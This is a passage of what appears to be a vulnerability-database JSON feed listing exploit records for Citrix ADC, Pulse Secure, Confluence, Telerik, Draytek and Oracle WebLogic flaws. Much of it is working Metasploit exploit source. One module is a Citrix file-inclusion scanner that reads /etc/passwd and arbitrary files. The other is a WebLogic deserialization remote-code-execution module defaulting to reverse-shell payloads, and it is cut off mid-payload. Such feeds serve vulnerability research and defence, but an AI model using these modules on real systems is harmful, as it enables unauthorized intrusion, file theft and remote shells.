"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-07T00:17:14", "description": "# Citrix ADC Vulns\n\n## CVE List\nhttps://support.citrix.com/arti...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-10T20:00:17", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193"], "modified": "2022-07-06T23:37:26", "id": "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:25:50", "description": "# CVE-2019-3396\nConfluence Widget Connector path traversal (CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-09T06:20:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2020-09-20T02:27:50", "id": "BEDCA78A-B03B-5065-AB50-3AC902332B03", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-10T18:30:15", "description": "# pwn-pulse.sh\n**Exploit for Pulse Connect Secure SSL VPN arbitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-09-09T15:58:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-10T18:18:14", "id": "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:45", "description": "Hi this is script to check IP address from shodan that vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-21T12:03:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-19T12:40:24", "id": "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-02T21:29:12", "description": "# CVE-2020-8515\nDraytek CVE-2020-8515 PoC I had kicking about. \n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T22:47:54", "type": "githubexploit", "title": "Exploit for OS Command Injection in Draytek Vigor2960 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2022-06-02T07:25:35", "id": "370515CC-C819-5D01-917D-2DF4728A28F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:06", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-27T15:06:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-12-13T12:56:51", "id": "059DC199-E425-50EE-B5F5-E351E0323E69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:27", "description": "# CVE-2019-11510-1\n\n## Exploit for Arbitrary File Read on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-27T09:21:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T06:25:19", "description": "SUMMARY\n-------\nSimple NSE script to detect Pulse Secure SSL VPN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-27T03:04:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-12T05:49:07", "id": "765DCAD5-2789-5451-BBFA-FAD691719F7A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2020-11-13T16:27:53", "description": "", "cvss3": {}, "published": "2020-11-13T00:00:00", "type": "packetstorm", "title": "Citrix ADC NetScaler Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-11-13T00:00:00", "id": "PACKETSTORM:160047", "href": "https://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Auxiliary::Scanner \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)', \n'Description' => %{ \nThe remote device is affected by multiple vulnerabilities. \n \nAn authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. \nAn unauthenticated remote attacker with access to the `NSIP/management interface` can exploit \nthis to bypass authorization (CVE-2020-8193). \n \nAnd Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which. \n}, \n'Author' => [ \n'Donny Maasland', # Discovery \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise) \n], \n'References' => [ \n['CVE', '2020-8193'], \n['CVE', '2020-8195'], \n['CVE', '2020-8196'], \n['URL', 'https://dmaasland.github.io/posts/citrix.html'], \n['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'], \n['URL', 'https://github.com/jas502n/CVE-2020-8193'] \n], \n'DisclosureDate' => '2020-07-09', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n} \n)) \n \nregister_options([ \nOptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]), \nOptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef create_session \nparams = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1' \n \nrequest = { \n'method' => 'POST', \n'uri' => \"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\", \n'ctype' => 'application/xml', \n'headers' => { \n'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8), \n'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8) \n}, \n'data' => '<appfwprofile><login></login></appfwprofile>' \n} \nrequest = request.merge({'cookie' => @cookie}) if @cookie \n \nresponse = send_request_raw(request) \nunless response && response.code == 406 \nprint_error(\"#{@message_prefix} - No response to session request.\") \nreturn \nend \n \nresponse.get_cookies \nend \n \ndef fix_session_rand \nresponse = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'menu', 'ss'), \n'cookie' => @cookie, \n'vars_get' => { \n'sid' => 'nsroot', \n'username' => 'nsroot', \n'force_setup' => '1' \n} \n) \n \nif response && response.code == 302 \nlocation = response.headers['location'] \n \nresponse = send_request_cgi( \n'method' => 'GET', \n'uri' => location, \n'cookie' => @cookie \n) \n \nreturn unless response && response.code == 200 \nend \n \nresponse.to_s.scan(/rand = \"([^\"]+)\"/).join \nend \n \ndef read_lfi(path, var_rand) \nparams = \"filter=path:#{path}\" \n \nrequest = { \n'method' => 'POST', \n'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\", \n'cookie' => @cookie, \n'ctype' => 'application/xml', \n'headers' => { \n'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8), \n'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8), \n'rand_key' => var_rand \n}, \n'data' => '<clipermission></clipermission>' \n} \n \nresponse = send_request_raw(request) \nend \n \ndef run_host(ip) \nproto = (datastore['SSL'] ? 'https' : 'http') \n@message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\" \n \n@cookie = create_session \nif @cookie && @cookie =~ /SESSID/ \nprint_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\") \n \nvar_rand = fix_session_rand \nunless var_rand \nprint_error(\"#{@message_prefix} - Unable to get rand value.\") \nreturn Exploit::CheckCode::Unknown \nend \nprint_status(\"#{@message_prefix} - Got rand: #{var_rand}\") \n \nprint_status(\"#{@message_prefix} - Re-breaking session...\") \ncreate_session \n \ncase datastore['MODE'] \nwhen /discovery/ \nresponse = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand) \nif response.code == 406 \nif response.body.include? ('root:*:0:0:') \nprint_warning(\"#{@message_prefix} - Vulnerable.\") \n \nreturn Exploit::CheckCode::Vulnerable \nend \nend \nwhen /interactive/ \n# TODO: parse response \nresponse = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand) \nif response.code == 406 \nprint_line(\"#{response.body}\") \nend \n \nreturn \nwhen /sessions/ \n# TODO: parse response \nresponse = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand) \nif response.code == 406 \nprint_line(\"#{response.body}\") \nend \n \nreturn \nend \nend \nprint_good(\"#{@message_prefix} - Not Vulnerable.\") \n \nreturn Exploit::CheckCode::Safe \nend \n \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/160047/citrixadvnetscaler-lfi.rb.txt"}, {"lastseen": "2019-03-28T22:53:29", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152268", "href": "https://packetstormsecurity.com/files/152268/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/powershell' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \n#include Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic Server T3 \ninterface can send a serialized object (weblogic.jms.common.StreamMessageImpl) \nto the interface to execute code on vulnerable hosts. \n}, \n'Author' => \n[ \n'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com) \n'Stephen Breen', # Vulnerability Discovery \n'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-4852'] \n], \n'Privileged' => false, \n'Platform' => %w{ unix win solaris }, \n'Targets' => \n[ \n[ 'Unix', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, \n'Payload' => { \n'Encoder' => 'cmd/ifs', \n'BadChars' => ' ', \n'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} \n} \n], \n[ 'Windows', \n'Platform' => 'win', \n'Payload' => {}, \n'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} \n], \n[ 'Solaris', \n'Platform' => 'solaris', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, \n'Payload' => { \n'Space' => 2048, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2015')) \n \nregister_options([Opt::RPORT(7001)]) \nend \n \n=begin This check is currently incompatible with the Tcp mixin. :-( \ndef check \nresp = send_request_cgi( \n'method' => 'GET', \n'uri' => '/console/login/LoginForm.jsp' \n) \n \nreturn CheckCode::Unknown unless resp && resp.code == 200 \n \nunless resp.body.include?('Oracle WebLogic Server Administration Console') \nvprint_warning(\"Oracle WebLogic Server banner cannot be found\") \nreturn CheckCode::Unknown \nend \n \n/WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.\\d*)/ =~ resp.body \nunless version \nvprint_warning(\"Oracle WebLogic Server version cannot be found\") \nreturn CheckCode::Unknown \nend \n \nversion = Gem::Version.new(version) \nvprint_good(\"Detected Oracle WebLogic Server Version: #{version}\") \ncase \nwhen version.to_s.start_with?('10.3') \nreturn CheckCode::Appears unless version > Gem::Version.new('10.3.6.0') \nwhen version.to_s.start_with?('12.1.2') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.1.2.0') \nwhen version.to_s.start_with?('12.1.3') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.1.3.0') \nwhen version.to_s.start_with?('12.2') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.2.1.0') \nend \n \nreturn CheckCode::Safe \nend \n=end \n \ndef t3_handshake \n# retrieved from network traffic \nshake = \"t3 12.2.1\\n\" \nshake << \"AS:255\\n\" \nshake << \"HL:19\\n\" \nshake << \"MS:10000000\\n\\n\" \n \nsock.put(shake) \nsleep(1) \nsock.get_once \nend \n \ndef build_t3_request_object \n# T3 request serialized data \n# retrieved by watching network traffic \n# This is a proprietary, undocumented protocol \n \n# TODO: Cite a source for the dissection of in the following 14 lines: \ndata = '000005c3' # lenght of the packet \ndata << '01' # CMD_IDENTIFY_REQUEST \ndata << '65' # QOS \ndata << '01' # Flags: \n# CONTEXT_JVMID_FLAG = 1 (has JVMIDs) \n# CONTEXT_TX_FLAG = 2 \n# CONTEXT_TRACE_FLAG = 4 \n# CONTEXT_EXTENDED_FLAG = 8 \n# CONTEXT_EXTENDED_USER_FLAG = 16 \ndata << 'ffffffff' # response id \ndata << 'ffffffff' # invocable id \ndata << '0000006a' # abbrev offset \ndata << '0000ea60' # reconnect timeout ?? \n \ndata << '0000001900937b484a' \ndata << '56fa4a777666f581daa4f5b90e2aebfc607499' \ndata << 'b4027973720078720178720278700000000a00' \ndata << '00000300000000000000060070707070707000' \ndata << '00000a000000030000000000000006007006' \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72001d' # className (29 bytes): \ndata << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry \ndata << '5461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c00007870' # remainder of object header \ndata << '72' # object header \ndata << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo \ndata << '65726e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71007e0003' # (Handle) 0x007e0003 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71007e0003' # (Handle) 0x007e0003 \ndata << '78707702000078' # block footers \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '7372' # object header \ndata << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry \ndata << '735461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '00007870' # remainder of object header \ndata << '72' # object header \ndata << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo \ndata << 'e7465726e616c2e56657273696f6e496e666f' # (continued) \ndata << '972245516452463e' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0003' # fieldCount = 3 \ndata << '5b0008' # array header (8 bytes) \ndata << '7061636b61676573' # ARRAY NAME = 'packages' \ndata << '740027' # TC_STRING className1 (39 bytes) \ndata << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo \ndata << '6e7465726e616c2f5061636b616765496e666f' # (continued) \ndata << '3b' # (continued) \ndata << '4c000e' # object header (14 bytes) \ndata << '72656c6561736556657273696f6e' # releaseVersion \ndata << '740012' # TC_STRING (18 bytes) \ndata << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes \ndata << '5b0012' # array header (18 bytes) \ndata << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String; \ndata << '740002' # TC_STRING (2 bytes) \ndata << '5b42' # 0x5b42 = [B \ndata << '78' # block footer \n \ndata << '720024' # class (36 bytes) \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo \ndata << '7465726e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \n \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '78' # class footer \ndata << '70' # TC_NULL \ndata << '77020000' # BLOCKDATA (2 bytes): 0x0000 \ndata << '78' # block footer \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72001d' # className (29 bytes): \ndata << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry \ndata << '5461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c00007870' # remainder of object header \ndata << '720021' # className (33 bytes) \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo \ndata << '65726e616c2e50656572496e666f' # (continued) \ndata << '585474f39bc908f1' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0006' # fieldCount = 6 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '5b00087061636b61676573' # 5: Array: packages \ndata << '740027' # TC_STRING (39 bytes) \ndata << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo; \ndata << '6e7465726e616c2f5061636b616765496e666f' # (continued) \ndata << '3b' # (continued) \ndata << '78' # block footer \ndata << '720024' # class header \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo; \ndata << '65726e616c2e56657273696f6e496e666f' # (continued) \ndata << '972245516452463e' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0003' # fieldCount = 3 \ndata << '5b0008' # 0: Array \ndata << '7061636b6167657371' # packages \ndata << '007e0003' # Handle = 0x00730003 